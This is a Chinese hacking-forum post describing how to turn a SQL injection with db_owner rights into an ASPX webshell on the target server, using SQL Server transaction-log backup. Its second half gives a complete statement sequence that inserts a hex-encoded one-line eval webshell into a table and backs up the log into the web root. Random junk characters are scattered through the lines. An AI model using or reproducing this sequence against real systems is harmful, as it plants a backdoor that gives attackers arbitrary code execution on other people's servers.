最近在看个网站的时候,aspx的字符型注点,db_owner权限,但是不支持asp,常见的方法是log备份asp,这次我们要备份aspx了(在这只讨论备份)。
& ?' T: X- K8 I但是直接写一句话虽然可以备份成功,但是执行时会报错,因此直接备份的一句话是无法执行的。0 E/ u; Q, R2 F5 g7 A4 Q
经过查找资料和本人测试发现,利用ie备份的时候,insert时,向表中插入内容,都是重复插入3条数据(ie6,ie8均如此),因此导致执行时出错;利用查询分析器insert的时候,只插入一条数据,因此不会报错,所以一句话成功执行。
: b% _4 X! P* P7 A. W经测试,备份如下格式:空格一句话空格、<br>一句话<br>时,有一定概率可以成功。不知道是什么原因,特来论坛请教,望高手解惑。
7 u5 G) h3 o. d
4 c9 Z2 \+ e) J8 r9 n+ X--------------------------------------------------------------) w5 a2 m: t+ j/ ^5 o
今天又试了下,发现直接备份有时候也可以成功,晕死了,为防止备份时插入多条内容导致出错," @% F& x* k" q( j2 D. H
自己修改备份语句如下:# l2 }2 j4 @' p1 Z" h
Drop table cmd;--
+ K, g5 e5 `$ u- n0 F" m- y, ]0 q% ^alter database db_test set RECOVERY FULL;--
/ u! Z; K4 i6 c# h8 Bcreate table cmd (a image,id int IDENTITY (1,1)); --添加了个自动编号的字段8 B9 {1 V e4 I; K, @" l9 Z
backup log db_test to disk = 'c:\bak' with init;--' v! M* _: j; U" @
insert into cmd (a) values(0x3C25402050616765204C616E67756167653D224A73637269707422253E3C256576616C28526571756573742E4974656D5B227A225D2C22756E7361666522293B253E);--0 p8 L3 j( P; w7 [+ E. t8 F
delete from cmd where id>1;--删除id>1的数据
+ R+ G7 d, l, j- o& }backup log db_test to disk = 'e:\webroot\test.aspx';--3 V* ]( L9 J+ o R
Drop table cmd;--
: l. n) j0 u; i$ s8 U1 ^希望对大家有用。 |